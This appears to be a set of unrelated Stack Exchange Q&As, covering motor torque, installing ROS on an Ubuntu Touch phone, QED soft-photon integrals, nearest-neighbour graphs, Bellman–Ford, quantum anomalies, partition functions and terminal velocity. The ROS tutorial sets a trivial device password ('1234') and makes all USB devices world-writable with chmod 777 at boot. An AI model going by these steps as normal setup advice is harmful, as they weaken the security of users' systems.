{ "domain": "robotics.stackexchange", "id": 26815, "tags": "ros" }
Does this motor move?
Question: Say we have a motor coil like this: We hang a mass (red ball) on the motor to prevent its rotation. We make the mass heavy enough that its weight directly opposes the motor force produced by that wire. $$mg = BIL$$ Does this motor turn? I feel like the answer is no, because that wire has no net force acting on it (the forces cancel out). However, there is still a force being produced by the right-hand wire (next to the N pole). It feels like this force should still be able to make the coil turn. Answer: Yes, the motor's coil will turn. Notice, the magnetic field $B$ exerts a force $=BIL$ on the right-hand wire in the vertically downward direction (given by Fleming's left-hand rule). Similarly, it exerts an equal force $=BIL$ on the left-hand wire in the vertically upward direction. These two equal and opposite forces form a couple which tends to turn the coil of the motor, depending on the magnitude of the net turning moment. $$\text{Turning moment acting on the coil}=BIL\times d$$ $$\text{Opposing moment produced by weight}, (mg=BIL)=mg\times \frac{d}{2}=BIL\times \frac d2$$ $$\implies BIL\times d>mg\times \frac{d}{2}$$ Since the turning moment is greater than the opposing moment from the weight $mg$, the coil will certainly turn.
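The moment comparison can be checked with a couple of lines (all numbers are illustrative; the mass is chosen so that mg = BIL, the force balance stated in the question):

```python
B, I, L, d = 0.5, 2.0, 0.1, 0.04   # field (T), current (A), wire length (m), coil width (m)
F = B * I * L                      # magnetic force on each side wire
mg = F                             # weight tuned to equal BIL
driving = F * d                    # the couple: two equal forces, lever arm d
opposing = mg * (d / 2)            # the weight acts at radius d/2 from the axis
assert driving > opposing          # net moment is positive: the coil turns
```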
{ "domain": "physics.stackexchange", "id": 68641, "tags": "electromagnetism" }
ros on google nexus 5
Question: Hi, I just installed ros on a google nexus 5 using Ubuntu touch as the operating system for the phone. The results are currently promising, so I would like to share them. I wrote down the steps to perform and want to create a wiki page someday. Currently I have ros running on the phone and can communicate with a ros core (running remote control of the turtlesim on the phone). The next steps I would like to add are: Cross-compile environment Accessing sensors (GPS and IMU) of the phone Is there something I missed? What is interesting for you? Do you have technical remarks and hints, especially regarding the hacks? Is there something to test? Regards, Georg Changelog: added kinect Introduction This guide describes how to install ros on a google nexus 5 smartphone with Ubuntu touch. When this guide was written (15/04) I used the development version of Ubuntu phone (vivid). After installation android will be erased completely. I did not test the phone functionality of Ubuntu touch but suppose that LTE is working. The precondition for the installation is a working wireless environment with DHCP and a PC with Ubuntu installed (I used 14.10 utopic). Installation of Ubuntu touch on the phone First it is necessary to install Ubuntu Phone on the device. For the installation I used the guide here [https://developer.ubuntu.com/en/start/ubuntu-for-devices/installing-ubuntu-for-devices/] without big problems. To flash the device the following command sets the phone into developer mode and adds a password. ubuntu-device-flash --channel="ubuntu-touch/devel" --bootstrap --server="http://system-image.tasemnice.eu" --password=1234 --developer-mode Sometimes the flashing does not succeed and fails without error; when that happens it is necessary to retry the above command. If you are not a developer yet, make sure to become one and set your password (described in the how-to above). The next step is to make the image on the phone writable.
phablet-config writable-image The device reboots and you can configure ssh. Enabling ssh: adb shell android-gadget-service enable ssh Copy your public key to the phone: adb shell mkdir /home/phablet/.ssh adb push ~/.ssh/id_rsa.pub /home/phablet/.ssh/authorized_keys adb shell chown -R phablet.phablet /home/phablet/.ssh adb shell chmod 700 /home/phablet/.ssh adb shell chmod 600 /home/phablet/.ssh/authorized_keys Now you can look up your IP on the phone and use ssh to connect: adb shell ip addr show wlan0|grep inet ssh phablet@ubuntu-phablet [or IP] You are ready to start the installation of ros: Installation of ros When you ssh into the phone it behaves like a normal Ubuntu vivid. Preparation of the device Unfortunately the partitions of the phone are inconvenient for our purposes. The root partition has a size of about 2GB, which is not sufficient to install ros. It was not possible to find a tidy way to resize the root partition, hence I used the hack found here [http://askubuntu.com/questions/514913/how-to-get-a-larger-root-partition-on-touch], which copies /usr and /opt into the home partition and binds them on boot. The following commands are executed as root (indicated by the # in front of the commands). sudo bash # cd /usr # find . -depth -print0 | cpio --null --sparse -pvd /home/usr/ # cd /opt # find . -depth -print0 | cpio --null --sparse -pvd /home/opt Create a script (nano is present) at /etc/init.d/bind.sh to mount and bind the moved directories on boot (see original link for explanation) #!/bin/sh if [ "X$1" = "Xstart" ]; then echo "Binding /home/usr to /usr..." 
chmod 4755 /home/usr/bin/passwd /home/usr/bin/chsh /home/usr/bin/pkexec /home/usr/bin/sudo /home/usr/bin/newgrp /home/usr/bin/gpasswd /home/usr/bin/chfn /home/usr/lib/pt_chown /home/usr/lib/eject/dmcrypt-get-device /home/usr/lib/openssh/ssh-keysign /home/usr/lib/dbus-1.0/dbus-daemon-launch-helper /home/usr/lib/policykit-1/polkit-agent-helper-1 /home/usr/lib/arm-linux-gnueabihf/oxide-qt/chrome-sandbox /home/usr/lib/arm-linux-gnueabihf/lxc/lxc-user-nic mount -o bind,suid /home/usr /usr echo "Binding /home/opt to /opt..." mount -o bind,suid /home/opt /opt echo "...done" fi and do not forget to make the script executable # chmod 755 /etc/init.d/bind.sh To execute the script, add a symbolic link in the start folder # ln -s /etc/init.d/bind.sh /etc/rcS.d/S13bind.sh Install 3rd party software sudo apt-get update sudo apt-get install bash-completion vim Install ros Ubuntu phone uses vivid as its distribution, hence not all ros dependencies are met (boost, avcodec). To solve that issue it is necessary to add trusty sources. That is something of a hack, but so far I have not run into dependency hell. To install indigo base you need the following sources from trusty to meet the dependencies: sudo sh -c 'echo "deb http://ports.ubuntu.com/ubuntu-ports/ trusty main restricted" > /etc/apt/sources.list.d/trusty.list' For some other packages (currently I just installed usb_cam) you need these sources sudo sh -c 'echo "deb http://ports.ubuntu.com/ubuntu-ports/ trusty universe" >> /etc/apt/sources.list.d/trusty.list' Now you can add the ros sources and the ros key sudo sh -c 'echo "deb http://packages.ros.org/ros/ubuntu trusty main" > /etc/apt/sources.list.d/ros-latest.list' wget https://raw.githubusercontent.com/ros/rosdistro/master/ros.key -O - | sudo apt-key add - and start the installation sudo apt-get update sudo apt-get install ros-indigo-ros-base -> Now proceed with the normal installation of ros Installation of kinect The installation of a kinect v1 was quite easy. 
sudo apt-get install ros-indigo-freenect-stack Add the following line to /etc/rc.local to change the permissions of the kinect #... # By default this script does nothing. chmod 777 -R /dev/bus/usb exit 0 The /opt/ros/indigo/share/freenect_launch/launch/freenect.launch file of the freenect stack is broken for the installed arm (Version 0.3.2). To fix it I replaced it with freenect.launch from my x86 installation (Version 0.4.1). To start it just run roslaunch freenect_launch freenect.launch I am quite disappointed because the performance is quite poor, but I will try to improve that. Originally posted by georg l on ROS Answers with karma: 186 on 2015-04-08 Post score: 6 Original comments Comment by dornhege on 2015-04-08: This looks awesome! The only other comment I have: This page is more for actual questions. Yours is already a tutorial. I would highly encourage you to copy this into a wiki page. The ros-users mailing list would be the best place to announce that. Comment by 130s on 2015-04-09: I second @dornhege. I'd like to see this great work as a tutorial on the ros wiki! Answer: Thank you for testing. Did you run apt-get upgrade or other updates on your phone? Are you sure the bind script is executed and /usr is mounted? df -ah | grep usr The output should look like: /dev/mmcblk0p28 27G 3.7G 22G 15% /usr Is there a /usr/lib/python2.7/py_compile.py? To fix your system you could try: sudo apt-get install -f If that fails you could try sudo dpkg-reconfigure python2.7-minimal sudo dpkg-reconfigure python2.7-python2.7 sudo dpkg --configure -a sudo apt-get install -f What do you plan to do with the phone? Depending on your input I will improve the installation how-to. Originally posted by georg l with karma: 186 on 2015-04-12 This answer was ACCEPTED on the original site Post score: 2 Original comments Comment by JollyGood on 2015-04-16: I've got similar output to yours when typing df -ah | grep usr. And I tried your suggestions, but it did not work. 
So, I re-installed Ubuntu and then installed python2.7-dev before binding /usr and /opt. Then everything worked smoothly. Thank you for your help.
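One step the tutorial above assumes but does not spell out is the ROS networking setup for the remote turtlesim test. A typical configuration might look like the following sketch (the IP addresses are placeholders; substitute your own):

```shell
# On the PC that runs the ROS master (IP assumed to be 192.168.1.10),
# set these before starting `roscore`:
export ROS_MASTER_URI=http://192.168.1.10:11311
export ROS_IP=192.168.1.10

# On the phone (IP assumed to be 192.168.1.20), point at the PC's
# master before running e.g. `rosrun turtlesim turtlesim_node`:
export ROS_MASTER_URI=http://192.168.1.10:11311
export ROS_IP=192.168.1.20
```

Setting ROS_IP explicitly avoids hostname-resolution problems between the phone and the PC.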
{ "domain": "robotics.stackexchange", "id": 21381, "tags": "robotic-arm, ros, kinect, installation, ubuntu" }
Transformations that preserve the metric
Question: I know that transformations that preserve the metric (like the Lorentz transformation, or rotations) have the property: $$S^T \eta S = \eta$$ However, I'm getting $S^TS = I$ and I'm not sure why: $$\delta^i_j = \eta^{ik}\eta_{kj} = \eta^{ik}\langle \vec{e'_k}, \vec{e'_j}\rangle = \eta^{ik}\langle {S^m}_k\vec{e_m}, {S^n}_j\vec{e_n}\rangle = \eta^{ik}{S^m}_k{S^n}_j\langle \vec{e_m}, \vec{e_n}\rangle = \eta^{ik}{S^m}_k{S^n}_j\eta_{mn} = \eta^{ik}S_{nk} {S^n}_j = {S_n}^i{S^n}_j = {(S^T)^i}_n{S^n}_j \implies S^TS =I$$ where $\vec{e'_i}$ are the basis vectors in the new coordinates, and $\vec{e_i}$ are the basis vectors in the old coordinate system. I'm not sure where I went wrong. Answer: If by transformations that keep the metric tensor invariant you mean that the components of $\eta$ do not change either, then in such a case I think $S^TS = I$ should be OK. Say we have a manifold with metric $g$. Now we pick a point $p$ on this manifold and, at this point, consider two frames, namely {${e_o, e_1, e_2,e_3}$} and {$\tilde{e}_o, \tilde{e}_1, \tilde{e}_2, \tilde{e}_3$}; then the components $\tilde{\eta}_{ab}$ of the metric at $p$ can be calculated in the second frame as $$ \tilde{\eta}_{a b} =g\left(\widetilde{e}_a, \widetilde{e}_b\right) $$ Now, if we Lorentz transform to the other frame, then \begin{aligned} \tilde{\eta}_{a b} &=g\left(\Lambda^m{ }_a e_m, \Lambda^n{ }_b e_n\right) \\ & =\Lambda^m{ }_a \Lambda^n{ }_b g\left(e_m, e_n\right) \\ & =\Lambda^m{ }_a \Lambda^n{ }_b \eta_{m n} \end{aligned} So if you say that $\tilde{\eta}_{ab} = \eta_{ab}$, then $\Lambda^m{ }_a \Lambda^n{ }_b \eta_{mn} = \eta_{ab}$, i.e. $\Lambda^T \eta \Lambda = \eta$.
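The distinction can also be checked numerically. Below is a sketch in 1+1 dimensions with an arbitrarily chosen rapidity: a boost $\Lambda$ satisfies $\Lambda^T\eta\Lambda=\eta$, but not $\Lambda^T\Lambda=I$:

```python
import math

def matmul(A, B):
    # Plain nested-list matrix product.
    return [[sum(A[i][k] * B[k][j] for k in range(len(B)))
             for j in range(len(B[0]))] for i in range(len(A))]

def transpose(A):
    return [list(row) for row in zip(*A)]

eta = [[-1, 0], [0, 1]]                     # 1+1D metric, signature (-,+)
phi = 0.7                                   # rapidity (arbitrary sample value)
L = [[math.cosh(phi), math.sinh(phi)],
     [math.sinh(phi), math.cosh(phi)]]      # Lorentz boost matrix

LTetaL = matmul(transpose(L), matmul(eta, L))
LTL = matmul(transpose(L), L)
print(LTetaL)   # ≈ eta, since cosh² - sinh² = 1
print(LTL)      # not the identity: diagonal entries are cosh(2φ) > 1
```

The raised/lowered-index bookkeeping in the question silently assumes indices can be moved with $\delta$ rather than $\eta$, which is exactly where the spurious $S^TS=I$ appears.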
{ "domain": "physics.stackexchange", "id": 97622, "tags": "metric-tensor, coordinate-systems, vectors, notation, linear-algebra" }
Distributing distinguishable particles in distinguishable boxes and computing the canonical partition function
Question: I have n distinguishable particles and m distinguishable boxes. If all particles are in the same box the system has an energy of $-\epsilon$; in all other cases the energy is 0. Now I want to compute the canonical partition function, the Helmholtz energy, and the entropy of the ground state. To start with I would count the number of possibilities to put all particles in a single box. There are $n!$ ways to arrange n distinguishable particles. And I have m boxes. And last I have $m!$ ways to arrange the different boxes. Therefore I have $n!*m*m!$ possibilities. The next step is to compute all possibilities to distribute n distinguishable particles in m distinguishable boxes. To distribute n particles in m boxes I have $m^{n}$ possibilities for a single configuration. Then I can arrange each configuration in $n!$ ways and last I can arrange the boxes again in $m!$ different ways. Hence the number of remaining possibilities is $$ m^{n}*n!*m!-n!*m*m!. $$ This gives the partition function: $$ Z(m,n,T)=m^{n}*n!*m!-n!*m*m!+n!*m*m!*e^{\beta\epsilon}=\\ m!*n!*m*(m^{n-1}-1+e^{\beta\epsilon}) $$ Since constant factors in the partition function do not matter when computing averages (they cancel), I can neglect the prefactor $m!*n!*m$. The partition function is therefore $$ Z(m,n,T)=m^{n-1}-1+e^{\beta\epsilon} $$ The Helmholtz free energy is then: $$ F=-k_bT\log(m^{n-1}-1+e^{\beta\epsilon}) $$ Now I am not sure if the counting I have done above is correct, and the next thing is I am not completely sure how to compute the ground state entropy. The entropy is defined as $S=-k_{b}\sum_{i}p_{i}\log(p_i)$, and for a single state it should be $S=-k_{b}\,p\log(p)$. 
The probability for the ground state would then be: $$ p_{G}=\frac{e^{\beta\epsilon}}{m^{n-1}-1+e^{\beta\epsilon}} $$ and hence the entropy $$ S=-\frac{k_b\,e^{\beta\epsilon}}{m^{n-1}-1+e^{\beta\epsilon}}\log\left(\frac{e^{\beta\epsilon}}{m^{n-1}-1+e^{\beta\epsilon}}\right) $$ But still I am not quite sure if this is correct; especially with the counting I feel very insecure. Thanks for your help. Answer: Based on Harry's comments I would like to answer this question to close this thread. It does not matter in which order I put the labeled particles into the boxes, since there are no drawers in the boxes and hence in the end I am not able to differentiate between the order of the particles anymore. This means $B(1,2,3)$ is the same as $B(2,1,3)$, because the balls are loose in this box and are able to roll around freely. The next thing is that the boxes have labels; this means that box one will always be box one no matter where it is put on the shelf. Hence there is no need to take into account the permutations of the boxes. Therefore the canonical partition function is just $$ Z(n,m,T)=(m^{n}-m)+me^{\beta\epsilon} $$ The Helmholtz free energy is $$ F(n,m,T)=-k_{B}T\log\left( m^{n} - m + me^{\beta\epsilon} \right) $$ And the ground state probability and the entropy stay the same, since one m factors out.
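The counting in the answer can be checked by brute-force enumeration of all $m^n$ assignments for small systems (a sketch; the values of $n$, $m$, and $\beta\epsilon$ are arbitrary small samples):

```python
import itertools
import math

def partition_function(n, m, beta_eps):
    # Enumerate every assignment of n labeled particles to m labeled boxes.
    Z = 0.0
    for assignment in itertools.product(range(m), repeat=n):
        # The energy is -epsilon exactly when all particles share one box,
        # contributing a Boltzmann factor exp(beta * epsilon); otherwise 1.
        all_same = len(set(assignment)) == 1
        Z += math.exp(beta_eps) if all_same else 1.0
    return Z

n, m, beta_eps = 3, 4, 0.7
Z_enum = partition_function(n, m, beta_eps)
Z_formula = (m**n - m) + m * math.exp(beta_eps)
print(Z_enum, Z_formula)  # the two values agree
```

The enumeration confirms that there are exactly $m$ ground-state configurations and $m^n - m$ zero-energy ones.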
{ "domain": "physics.stackexchange", "id": 52368, "tags": "thermodynamics, statistical-mechanics" }
Terminal Velocity
Question: Suppose a bullet of 2 grams is falling at a speed of 200 km/h. How can we know the time after which it reaches its terminal velocity? Also, when it reaches its terminal velocity, the force of friction and the force of gravity become equal and it stops accelerating. At this point, does the force of friction acting on it become constant, or does it keep increasing and also decrease the velocity of the object? Answer: It's not actually friction, it's the drag force, also called air resistance. Technically, they're different (even though people do sometimes say "air friction"). The drag force depends on the object's speed, shape, and size, as well as the density of the air, but in the ideal case you can assume that the object's shape and size and the density are constant. In that case, when an object is falling at terminal velocity, the forces on it balance out, which means it has zero acceleration - in other words, its velocity doesn't change. And if the velocity doesn't change, then the drag force, which depends on velocity, won't change either. So the object is "stuck" in a steady state in which the drag force on it will remain constant as it falls. In practice, though, an object never actually reaches terminal velocity unless it starts at terminal velocity. As it gets closer and closer to terminal velocity, the drag force on it gets closer and closer to exactly balancing out the gravitational force, which means that the net force on it, and thus its acceleration, becomes less and less. Basically, as the object gets closer to terminal velocity, the rate at which it continues to approach terminal velocity gets slower. It'll get continually closer to terminal velocity as time goes on, but it never quite reaches it. Last year I wrote a blog post about this issue which discusses it using the actual math. It might be of interest to you.
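The asymptotic approach to terminal velocity is easy to see numerically. Below is a toy sketch with quadratic drag $F = kv^2$; the mass matches the 2 g bullet from the question, but the drag coefficient $k$ is an assumed value chosen only for illustration. Since terminal velocity is only reached asymptotically, the loop asks when 99.9% of it is reached:

```python
import math

g = 9.81      # gravitational acceleration, m/s^2
m = 0.002     # mass, kg (the 2 g bullet from the question)
k = 6.3e-6    # drag coefficient, kg/m (assumed value for illustration)
v_term = math.sqrt(m * g / k)   # speed at which drag balances gravity

v, t, dt = 0.0, 0.0, 1e-3
while v < 0.999 * v_term:
    a = g - (k / m) * v * v     # net acceleration shrinks as v -> v_term
    v += a * dt
    t += dt

print(f"v_term = {v_term:.1f} m/s; 99.9% of it is reached after ~{t:.1f} s")
```

Doubling the 99.9% target to 99.99% adds noticeably more time, illustrating the ever-slowing approach the answer describes.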
{ "domain": "physics.stackexchange", "id": 1000, "tags": "gravity, velocity, friction" }
Weinberg soft photon integral
Question: In deriving the rate of emission of arbitrary numbers of soft photons in a general QED process, Weinberg performs the following integral (equations 13.2.8-9): $$-\pi(\vec{p}_m\cdot \vec{p}_n)\int_{\lambda\leq|\vec{q}|\leq\Lambda}\frac{d^3\vec{q}}{|\vec{q}|^3(E_n-\hat{q}\cdot\vec{p}_n)(E_m-\hat{q}\cdot\vec{p}_m)}=\frac{2\pi^2}{\beta_{nm}}\ln\left(\frac{1+\beta_{nm}}{1-\beta_{nm}}\right)\ln\left(\frac{\Lambda}{\lambda}\right)$$ where $$\beta_{nm}=\sqrt{1-\frac{m_n^2m_m^2}{(\vec{p}_n\cdot\vec{p}_m)^2}}.$$ I am trying to compute this integral for myself but am having some trouble with the angular integral. Would someone mind giving me some assistance? Answer: I think I solved it; unfortunately I don't have time to do all the manipulations after the integral is computed. Let's change to spherical coordinates $$I=-\pi(\vec{p}_m\cdot\vec{p}_n)\int \text{d}q\text{d}\phi \sin(\phi) \text{d}\theta\frac{1}{q}\frac{1}{(E_n-p_n \cos(\phi))(E_m-p_m \cos(\phi))}$$ It follows that: $$I=-\pi(\vec{p}_m\cdot\vec{p}_n)\ln\left(\frac{\Lambda}{\lambda}\right)2\pi \int_0^{\pi}\text{d}\phi \frac{\sin(\phi)}{(E_n-p_n \cos(\phi))(E_m-p_m \cos(\phi))}$$ Now, let's change variables $$x=\cos(\phi) \\ \text{d}x=-\sin(\phi)\text{d}\phi$$ so we have $$I=-2\pi^2(\vec{p}_m\cdot\vec{p}_n)\ln\left(\frac{\Lambda}{\lambda}\right) \int_{-1}^{1}\text{d}x\frac{1}{(E_n-p_n x)(E_m-p_m x)}$$ Now we decompose into partial fractions: $$\frac{1}{(E_n-p_n x)(E_m-p_m x)}=\frac{A}{(E_n-p_n x)}+\frac{B}{(E_m-p_m x)}$$ and you find that $$A=\frac{-p_n}{E_n p_m-E_m p_n} \\ B=\frac{p_m}{E_np_m-E_mp_n}$$ Then, it's easy to see that $$I=2\pi^2(\vec{p}_m\cdot\vec{p}_n)\ln\left(\frac{\Lambda}{\lambda}\right)\left[\frac{A}{p_n}\ln\left(E_n-p_nx\right)+\frac{B}{p_m}\ln\left(E_m-p_mx\right)\right]^1_{-1}$$ by making $A$ and $B$ explicit we get: $$ I=2\pi^2\frac{(\vec{p}_m\cdot\vec{p}_n)}{E_np_m-E_mp_n}\ln\left(\frac{\Lambda}{\lambda}\right) \left[-\ln\left(E_n-p_nx\right)+\ln\left(E_m-p_mx\right)\right]^1_{-1}$$ therefore 
$$I=2\pi^2\frac{(\vec{p}_m\cdot\vec{p}_n)}{E_np_m-E_mp_n}\ln\left(\frac{\Lambda}{\lambda}\right)\left[\ln\left(\frac{E_m-p_m}{E_n-p_n}\right)+\ln\left(\frac{E_n+p_n}{E_m+p_m}\right)\right]$$ and then it should just be a matter of rearranging the factors in a convenient way. I hope that helped!
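The closed form of the $x$-integral $\int_{-1}^{1}\mathrm{d}x/((E_n-p_nx)(E_m-p_mx))$ appearing above can be verified numerically (a sketch with arbitrary sample values $E_n=2$, $p_n=1$, $E_m=3$, $p_m=2$; note the mixed denominator $E_np_m-E_mp_n$, with both energies appearing):

```python
import math

def angular_integral_numeric(En, pn, Em, pm, steps=200000):
    # Simpson's rule for the integral over x = cos(phi) in [-1, 1];
    # the integrand is smooth there as long as En > pn and Em > pm.
    f = lambda x: 1.0 / ((En - pn * x) * (Em - pm * x))
    h = 2.0 / steps
    s = f(-1.0) + f(1.0)
    for i in range(1, steps):
        s += (4 if i % 2 else 2) * f(-1.0 + i * h)
    return s * h / 3.0

def angular_integral_closed(En, pn, Em, pm):
    # Closed form from the partial-fraction decomposition.
    D = 1.0 / (En * pm - Em * pn)
    return D * math.log(((En - pn) * (Em + pm)) / ((Em - pm) * (En + pn)))

print(angular_integral_numeric(2, 1, 3, 2), angular_integral_closed(2, 1, 3, 2))
```

The overall sign from the $\mathrm{d}x=-\sin(\phi)\,\mathrm{d}\phi$ substitution is what flips the bracket into the form quoted in the answer.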
{ "domain": "physics.stackexchange", "id": 19822, "tags": "homework-and-exercises, quantum-field-theory, quantum-electrodynamics, integration" }
Number of connected components of a random nearest neighbor graph?
Question: Let us sample some big number N of points uniformly at random on $[0,1]^d$. Consider the 1-nearest-neighbor graph based on such a data cloud. (Let us look at it as an UNdirected graph.) Question: What would the number of connected components be, depending on d? (As a percent of N, the number of points.) The simulation below suggests 31% for d=2, 20% for d=20, etc.: Percent Dimension: 31 2 28 5 25 10 20 20 15 50 13 100 10 1000 See code below. (One can run it on colab.research.google.com without installing anything on your computer.) If someone can comment on the more general questions here: https://mathoverflow.net/q/362721/10446 that would be greatly appreciated. !pip install python-igraph !pip install cairocffi import igraph import time from sklearn.neighbors import NearestNeighbors import numpy as np t0 = time.time() dim = 20 n_sample = 10**4 for i in range(10): # repeat simulation 10 times to get more stat X = np.random.rand(n_sample, dim) nbrs = NearestNeighbors(n_neighbors=2, algorithm='ball_tree', ).fit(X) distances, indices = nbrs.kneighbors(X) g = igraph.Graph( directed = True ) g.add_vertices(range(n_sample)) g.add_edges(indices ) g2 = g.as_undirected(mode = 'collapse') r = g2.clusters() print(len(r),len(r)/n_sample*100 , time.time() - t0) Answer: For $n$ uniformly random points in a unit square the number of components is $$\frac{3\pi}{8\pi+3\sqrt{3}}n+o(n)$$ See Theorem 2 of D. Eppstein, M. S. Paterson, and F. F. Yao (1997), "On nearest-neighbor graphs", Disc. Comput. Geom. 17: 263–282, https://www.ics.uci.edu/~eppstein/pubs/EppPatYao-DCG-97.pdf For points in any fixed higher dimension it is $\Theta(n)$; I don't know the exact constant of proportionality but the paper describes how to calculate it.
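The $d=2$ constant from the cited theorem evaluates to roughly the 31% observed in the question's simulation — a quick check:

```python
import math

# Fraction of connected components per point for d = 2,
# from Eppstein, Paterson, and Yao (1997), Theorem 2.
c = 3 * math.pi / (8 * math.pi + 3 * math.sqrt(3))
print(f"{100 * c:.1f}%")  # ~31.1%, matching the simulated 31% for d = 2
```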
{ "domain": "cstheory.stackexchange", "id": 5050, "tags": "graph-theory, random-graphs" }
How do I make sure I get the correct Bellman–Ford path?
Question: I was studying shortest path algorithms and ran into an issue regarding Bellman–Ford for the image below. Following the graph, I see that node 3 has a length of 1 while node 2 has a length of 2. When computing the path from 1 to 8, which is the correct path: 1->2->6->4->7->8 or 1->3->2->6->4->7->8? I can see that 1->2->6->4->7->8 has the smallest path length, but I'm confused because node 2 has length 2 while node 3 has length 1. Will Bellman–Ford always give the shortest possible path, or might it output a longer path because one of the nodes had a shorter length but led to a longer path? Answer: From Wikipedia: The Bellman–Ford algorithm is an algorithm that computes shortest paths from a single source vertex to all of the other vertices in a weighted digraph. What is a shortest path? According to Wikipedia: In graph theory, the shortest path problem is the problem of finding a path between two vertices (or nodes) in a graph such that the sum of the weights of its constituent edges is minimized. Wikipedia isn't always a reliable source, but in this case the definitions are spot on. Suppose that $G=(V,E,w)$ is a weighted undirected graph. A path between two vertices $x,y \in V$ is a list $$ v_0 = x, v_1, \ldots, v_\ell = y $$ such that $(v_i,v_{i+1}) \in E$ for all $i < \ell$ (possibly $\ell = 0$). The weight of the path is $$ \sum_{i=0}^{\ell-1} w(v_i,v_{i+1}). $$ A shortest path between $x$ and $y$ is a path with minimum weight. The Bellman–Ford algorithm finds the lengths of all shortest paths from a given vertex $x$ to all other vertices. It also generates auxiliary information which makes it possible to find the corresponding shortest paths.
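The question's image is not reproduced here, so as an illustration on a small made-up graph, here is a sketch of Bellman–Ford with predecessor tracking — the "auxiliary information" the answer mentions — which lets you recover the actual shortest path instead of guessing from per-node labels:

```python
def bellman_ford(num_vertices, edges, source):
    """edges: list of (u, v, weight) tuples; vertices are 0..num_vertices-1."""
    INF = float("inf")
    dist = [INF] * num_vertices
    pred = [None] * num_vertices
    dist[source] = 0
    for _ in range(num_vertices - 1):        # relax every edge |V|-1 times
        for u, v, w in edges:
            if dist[u] + w < dist[v]:
                dist[v] = dist[u] + w
                pred[v] = u
    for u, v, w in edges:                    # extra pass: negative cycles?
        if dist[u] + w < dist[v]:
            raise ValueError("negative-weight cycle reachable from source")
    return dist, pred

def path_to(pred, target):
    path = []
    while target is not None:
        path.append(target)
        target = pred[target]
    return path[::-1]

# Made-up example graph (NOT the one from the question's image):
edges = [(0, 1, 1), (0, 2, 4), (1, 2, 2), (2, 3, 1), (1, 3, 7)]
dist, pred = bellman_ford(4, edges, 0)
print(dist[3], path_to(pred, 3))  # 4 [0, 1, 2, 3]
```

Because every edge is relaxed $|V|-1$ times, the final distances are globally optimal regardless of which intermediate node looked "shorter" early on.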
{ "domain": "cs.stackexchange", "id": 17716, "tags": "algorithms, shortest-path" }
Among free quantum field theories, do all 't Hooft anomalies arise from chiral fermions?
Question: In quantum field theory, a global symmetry group that can't be gauged is said to have an 't Hooft anomaly. One of the most familiar examples is the free massless Dirac fermion in $3+1$ dimensional spacetime: it has a global $(U(1)_V\times U(1)_A)/\mathbb{Z}_2$ symmetry, and we can gauge the $U(1)_V$ part to get quantum electrodynamics, but then we can't gauge the rest of it. That's a nice example because it starts with a non-interacting quantum field theory. Many different types of 't Hooft anomaly are known from other quantum field theories, many of them not involving chiral fermions, and non-interacting examples of those would also be nice to have — but slide $13$ in [1] seems to say that such examples don't exist! Here it is in the author's words: For free theories or theories which are free in the UV, all 't Hooft anomalies arise from chiral fermions...$^\dagger$ The statement is probably true (the author is an expert), but I don't know how to deduce it. I'm not even sure I understand what it means, because pages $19$-$22$ in the same presentation review what seems to be an exception, namely the 't Hooft anomaly in the combination of the electric and magnetic $1$-form symmetries of the free electromagnetic field. Isn't that an example of an 't Hooft anomaly in a non-interacting theory that doesn't arise from chiral fermions? What am I missing? Does the previous statement about chiral fermions only apply to conventional ($0$-form) global symmetries? Or is there a sense in which the electromagnetism example isn't "free" (like the lattice version with a compact gauge group)? Question: What exactly are the condition(s) that make the highlighted statement true? The paper [2] has the same title and includes the same author. I haven't finished studying it yet (that will take me a while), but I searched through it and didn't find an answer. 
Footnote: $^\dagger$ The Dirac fermion example involves "chiral fermions" in the sense that the global symmetry with the anomaly acts independently on the two chiral parts. References: [1] Kapustin, slides titled "Generalized Global Symmetries" (http://physics.berkeley.edu/sites/default/files/_/PDF/kapustin.pdf) [2] Gaiotto et al, "Generalized Global Symmetries", https://arxiv.org/abs/1412.5148 Answer: In my understanding, what the author means in the slides is that the anomalies can be carried by chiral fermions. Namely, that for free theories the 't Hooft anomaly can be realised by inflow through a Chern-Simons term, and so since chiral fermions have the same inflow it can be cancelled by putting chiral fermions in the theory. Reversing the logic if one is interested just in the anomaly they can study it by studying the chiral fermions (see also [1]). This is a special case of the belief that anomalies can always be saturated by symmetry preserving gapless phases [2] (an aside to that, the main claim of [2] was that they can't be always saturated by symmetry preserving gapped phases) [1] L. Alvarez-Gaume and P. H. Ginsparg, The Structure of Gauge and Gravitational Anomalies, Annals Phys. 161 (1985) 423. [2] C. Córdova and K. Ohmori, Anomaly Obstructions to Symmetry Preserving Gapped Phases, [arXiv:1910.04962].
{ "domain": "physics.stackexchange", "id": 66967, "tags": "quantum-field-theory, quantum-anomalies, chirality" }
Do orbiting planets have infinite energy?
Question: I know that planets can't have infinite energy, due to the law of conservation of energy. However, I'm confused because I see a contradiction and it would be great if someone could explain it. Energy is defined as the capacity to do work. Work is defined as Force x Distance. Force is defined as Mass x Acceleration. Thus, if we accelerate a mass for some distance by using some force, we are doing work, and we must have had energy in order to do that work. In orbit, planets change direction, which is a change in velocity, which is an acceleration. Planets have mass, and they are moving over a particular distance. Thus, work is being done to move the planets. In an ideal world, planets continue to orbit forever. Thus, infinite work will be done on the planets as they orbit. How can infinite work be done (or finite work over an infinite time period, if you'd like to think of it that way) with a finite amount of energy? Where is the flaw in this argument? Answer: Your definitions are incorrect. Force is the rate of change of momentum and is a vector. More importantly, the work done by a force is not force x distance, it is the force resolved in the direction of the displacement x the magnitude of the displacement. This is more formally known as the scalar product of force and displacement. In the case of a circular orbit, the centripetal force supplied by gravity is at right angles to the displacement, so no work is done.
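The scalar-product point can be checked numerically: accumulate $\vec F\cdot d\vec r$ around a circular orbit and the contributions cancel step by step (a toy sketch in arbitrary units):

```python
import math

# Numerically accumulate the work F·dr over one full circular orbit
# (toy units: radius R = 1, force magnitude F = 1).
steps = 100_000
R, F = 1.0, 1.0
dtheta = 2 * math.pi / steps
work = 0.0
for i in range(steps):
    theta = i * dtheta
    # Centripetal force points toward the center: F_vec = -F * r_hat
    fx, fy = -F * math.cos(theta), -F * math.sin(theta)
    # The displacement along the circle is tangential:
    dx, dy = -R * math.sin(theta) * dtheta, R * math.cos(theta) * dtheta
    work += fx * dx + fy * dy

print(work)  # ≈ 0: the force is always perpendicular to the motion
```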
{ "domain": "physics.stackexchange", "id": 56389, "tags": "newtonian-mechanics, newtonian-gravity, energy-conservation, orbital-motion, planets" }
Time-Frequency Resolution issues
